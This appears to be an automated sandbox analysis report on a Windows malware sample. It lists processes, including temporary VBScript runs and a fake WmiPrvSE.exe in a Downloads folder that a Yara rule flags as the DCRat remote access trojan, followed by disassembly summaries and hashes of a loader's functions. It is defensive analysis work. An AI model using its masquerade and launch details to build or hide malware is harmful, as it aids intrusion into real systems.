                                                Target ID:42
                                                Start time:10:19:51
                                                Start date:25/04/2024
                                                Path:C:\Windows\System32\wscript.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d365112d-c481-40f0-92bb-6621c11733c0.vbs"
                                                Imagebase:0x7ff756060000
                                                File size:170'496 bytes
                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:43
                                                Start time:10:19:51
                                                Start date:25/04/2024
                                                Path:C:\Windows\System32\wscript.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\c327c276-7051-4e25-8eb9-181648a7a409.vbs"
                                                Imagebase:0x7ff756060000
                                                File size:170'496 bytes
                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                General

                                                Target ID:44
                                                Start time:10:20:12
                                                Start date:25/04/2024
                                                Path:C:\Users\Default\Downloads\WmiPrvSE.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\Default User\Downloads\WmiPrvSE.exe"
                                                Imagebase:0x360000
                                                File size:3'550'208 bytes
                                                MD5 hash:53758CEA18D59182A809208313D5042A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000002C.00000002.3632602400.000000000290D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Has exited:true

                                                Disassembly

                                                Reset < >

                                                  Non-executed Functions

                                                  Function 00007FF7605B21F0 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 213windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • AttachConsole.KERNEL32 ref: 00007FF7605B2217
                                                  • IsDebuggerPresent.KERNEL32 ref: 00007FF7605B2221
                                                  • CoInitializeEx.OLE32 ref: 00007FF7605B2257
                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7605B23B8
                                                  • GetMessageW.USER32 ref: 00007FF7605B23E7
                                                  • TranslateMessage.USER32 ref: 00007FF7605B23F6
                                                  • DispatchMessageW.USER32 ref: 00007FF7605B2401
                                                  • GetMessageW.USER32 ref: 00007FF7605B2414
                                                  • CoUninitialize.OLE32 ref: 00007FF7605B241E
                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7605B2525
                                                    • Part of subcall function 00007FF7605B2990: AllocConsole.KERNEL32(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B2994
                                                    • Part of subcall function 00007FF7605B2990: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B29A7
                                                    • Part of subcall function 00007FF7605B2990: freopen_s.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B29C3
                                                    • Part of subcall function 00007FF7605B2990: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B29D2
                                                    • Part of subcall function 00007FF7605B2990: _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B29DB
                                                    • Part of subcall function 00007FF7605B2990: _dup2.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B29E8
                                                    • Part of subcall function 00007FF7605B2990: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B29F3
                                                    • Part of subcall function 00007FF7605B2990: freopen_s.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B2A0F
                                                    • Part of subcall function 00007FF7605B2990: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B2A1E
                                                    • Part of subcall function 00007FF7605B2990: _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B2A27
                                                    • Part of subcall function 00007FF7605B2990: _dup2.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B2A34
                                                    • Part of subcall function 00007FF7605B2990: ?sync_with_stdio@ios_base@std@@SA_N_N@Z.MSVCP140(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B2A3C
                                                    • Part of subcall function 00007FF7605B2990: FlutterDesktopResyncOutputStreams.FLUTTER_WINDOWS(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B2A42
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: Message__acrt_iob_func$Console_dup2_fileno_invalid_parameter_noinfo_noreturnfreopen_s$?sync_with_stdio@ios_base@std@@AllocAttachDebuggerDesktopDispatchFlutterInitializeOutputPresentResyncStreamsTranslateUninitialize
                                                  • String ID: MVPLoader$data
                                                  • API String ID: 3205443371-1987692941
                                                  • Opcode ID: 0db85800ba851b8736b0c42bf802bb82b8ff773d3e7f17a56fa306fb409dcf05
                                                  • Instruction ID: c6b7801903681abc71a69c331d18e611456f6b4a5352be98df365f35bfb172ce
                                                  • Opcode Fuzzy Hash: 0db85800ba851b8736b0c42bf802bb82b8ff773d3e7f17a56fa306fb409dcf05
                                                  • Instruction Fuzzy Hash: 97A18572A18A86C1EB10AB34E4647ADA361FB45794F904231EA9D07BDADF7CF584C720
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FF7605B6520 Relevance: 16.6, APIs: 11, Instructions: 137COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: #413Zoomed
                                                  • String ID:
                                                  • API String ID: 599385055-0
                                                  • Opcode ID: 7c6b68c11e0ea8879cbe58b615476f028679247ebeda1f9cf46e4975f0145be9
                                                  • Instruction ID: 707b9cf9ddd4f8a29536798c1e87185071d520aa290e7f5fba1c48e1a560a41d
                                                  • Opcode Fuzzy Hash: 7c6b68c11e0ea8879cbe58b615476f028679247ebeda1f9cf46e4975f0145be9
                                                  • Instruction Fuzzy Hash: 93513671D0C306CAFA60BB55A968B78E790AF04795FC88039C90E523E3DF7DB5858A30
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FF7605B33F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 58libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: Window$LibraryLongProc$AddressFreeLoad
                                                  • String ID: EnableNonClientDpiScaling$User32.dll
                                                  • API String ID: 4038316984-3360098728
                                                  • Opcode ID: 0deed3525de6556a72330e0eb43d994e4c463833a0f9993382e6288c7714ea49
                                                  • Instruction ID: c5269c008b40e18d6102c525e03b53f0b865ce4c792171099cd02a7b81fb3426
                                                  • Opcode Fuzzy Hash: 0deed3525de6556a72330e0eb43d994e4c463833a0f9993382e6288c7714ea49
                                                  • Instruction Fuzzy Hash: 05117F29A09B46C2EA10EF16B818929F3A0BF89FD0F884435DD4E13766DF3CF4458310
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FF7605BDFFC Relevance: 13.6, APIs: 9, Instructions: 71COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 313767242-0
                                                  • Opcode ID: b848698c50f38a8fa3d14d0ac47d8229b46266256726a31ac9501e55a16a132a
                                                  • Instruction ID: 5c8cb148bfcc6e1c23e971bb1e5cc1be0b2b1220f39bf06272e1bdc5e945aa35
                                                  • Opcode Fuzzy Hash: b848698c50f38a8fa3d14d0ac47d8229b46266256726a31ac9501e55a16a132a
                                                  • Instruction Fuzzy Hash: E7316276609B85C5EB60AF64E8947EDB360FB44704F44403ADA4E47B96EF3CE548C720
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FF7605BDEE0 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                  • String ID:
                                                  • API String ID: 2933794660-0
                                                  • Opcode ID: 041af0cdf31b537727a92d816ff4ed52b43694a07b4bfe3ea348fdce870c8b31
                                                  • Instruction ID: c28faa8d7e5e3eb88f7d125b0acf162ba43eb9633a42e294508fdc817ab3c416
                                                  • Opcode Fuzzy Hash: 041af0cdf31b537727a92d816ff4ed52b43694a07b4bfe3ea348fdce870c8b31
                                                  • Instruction Fuzzy Hash: C4114C26B14B01CAEB009B64E8656B873A4FB19758F840E35DA6D827A5DF38E1948350
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FF7605BE1DC Relevance: .0, Instructions: 2COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a16ccc6eb8c9ecaabbb3113d36633e4e51c475e292a91614fd0349849997c0bd
                                                  • Instruction ID: 322d0e432f718c6757e4dd40262ae49d2be3be4f4d8cf268f2fdd089e85777f6
                                                  • Opcode Fuzzy Hash: a16ccc6eb8c9ecaabbb3113d36633e4e51c475e292a91614fd0349849997c0bd
                                                  • Instruction Fuzzy Hash: 5CA00125948846D0E614AB08A864930A234AB51300B944071E00E51262AF3CB500C320
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FF7605B36B0 Relevance: 31.7, APIs: 21, Instructions: 168COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ?width@ios_base@std@@QEBA_JXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B36F3
                                                  • ?width@ios_base@std@@QEBA_JXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3708
                                                  • ?width@ios_base@std@@QEBA_JXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B371D
                                                  • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B373D
                                                  • ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B375C
                                                  • ?tie@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_ostream@DU?$char_traits@D@std@@@2@XZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3770
                                                  • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3783
                                                  • ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3793
                                                  • ?flags@ios_base@std@@QEBAHXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B37BA
                                                  • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B37DA
                                                  • ?fill@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B37ED
                                                  • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B37F9
                                                  • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3816
                                                  • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3825
                                                  • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B384A
                                                  • ?fill@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B385D
                                                  • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3869
                                                  • ?width@ios_base@std@@QEAA_J_J@Z.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3896
                                                  • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B38AC
                                                  • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B38B6
                                                  • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B38C7
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: U?$char_traits@$D@std@@@std@@$D@std@@@2@$?rdbuf@?$basic_ios@V?$basic_streambuf@$?width@ios_base@std@@$?fill@?$basic_ios@?good@ios_base@std@@?sputc@?$basic_streambuf@$?flags@ios_base@std@@?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?tie@?$basic_ios@Osfx@?$basic_ostream@V12@V?$basic_ostream@
                                                  • String ID:
                                                  • API String ID: 3703345220-0
                                                  • Opcode ID: 51a1bd9b16cdd61ddd8cc5ac7860404afae2a6773f71a1b433e9ee2371b47c5c
                                                  • Instruction ID: daee7205c1a8316a9175596b6dbf1ea16374cfabc0df9afa73747c9655021c12
                                                  • Opcode Fuzzy Hash: 51a1bd9b16cdd61ddd8cc5ac7860404afae2a6773f71a1b433e9ee2371b47c5c
                                                  • Instruction Fuzzy Hash: B4616E65A09A41C2EF24AF1DE5A4A38E760FF85F91B888931DA4E57792CF3CF006C315
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FF7605B6F50 Relevance: 31.7, APIs: 21, Instructions: 163COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ?width@ios_base@std@@QEBA_JXZ.MSVCP140 ref: 00007FF7605B6F7D
                                                  • ?width@ios_base@std@@QEBA_JXZ.MSVCP140 ref: 00007FF7605B6F92
                                                  • ?width@ios_base@std@@QEBA_JXZ.MSVCP140 ref: 00007FF7605B6FA7
                                                  • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140 ref: 00007FF7605B6FC7
                                                  • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7605B6FE6
                                                  • ?tie@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_ostream@DU?$char_traits@D@std@@@2@XZ.MSVCP140 ref: 00007FF7605B6FFA
                                                  • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7605B700D
                                                  • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7605B701D
                                                  • ?flags@ios_base@std@@QEBAHXZ.MSVCP140 ref: 00007FF7605B7043
                                                  • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140 ref: 00007FF7605B706A
                                                  • ?fill@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADXZ.MSVCP140 ref: 00007FF7605B707D
                                                  • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF7605B7089
                                                  • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140 ref: 00007FF7605B70A4
                                                  • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140 ref: 00007FF7605B70B3
                                                  • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140 ref: 00007FF7605B70DA
                                                  • ?fill@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADXZ.MSVCP140 ref: 00007FF7605B70ED
                                                  • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF7605B70F9
                                                  • ?width@ios_base@std@@QEAA_J_J@Z.MSVCP140 ref: 00007FF7605B7122
                                                  • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7605B7137
                                                  • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7605B7141
                                                  • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140 ref: 00007FF7605B7152
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: U?$char_traits@$D@std@@@std@@$D@std@@@2@$?rdbuf@?$basic_ios@V?$basic_streambuf@$?width@ios_base@std@@$?fill@?$basic_ios@?good@ios_base@std@@?sputc@?$basic_streambuf@$?flags@ios_base@std@@?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?tie@?$basic_ios@Osfx@?$basic_ostream@V12@V?$basic_ostream@
                                                  • String ID:
                                                  • API String ID: 3703345220-0
                                                  • Opcode ID: 6032fbfd645aa7f30a91e1ad0e336ebd58a8a148f04c2cc15f7a21850a397b76
                                                  • Instruction ID: 05224e2de6d33e392bf7ad838acb79996683de363ff3cc0f7993872b93faef49
                                                  • Opcode Fuzzy Hash: 6032fbfd645aa7f30a91e1ad0e336ebd58a8a148f04c2cc15f7a21850a397b76
                                                  • Instruction Fuzzy Hash: 3B61FF26A48A4AC1DB14AF29E574739A760FF85F95B899831CA0E43766CF3CF405C714
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FF7605B2990 Relevance: 24.5, APIs: 13, Strings: 1, Instructions: 41memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • AllocConsole.KERNEL32(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B2994
                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B29A7
                                                  • freopen_s.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B29C3
                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B29D2
                                                  • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B29DB
                                                  • _dup2.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B29E8
                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B29F3
                                                  • freopen_s.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B2A0F
                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B2A1E
                                                  • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B2A27
                                                  • _dup2.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B2A34
                                                  • ?sync_with_stdio@ios_base@std@@SA_N_N@Z.MSVCP140(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B2A3C
                                                  • FlutterDesktopResyncOutputStreams.FLUTTER_WINDOWS(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B2A42
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmpDownload File
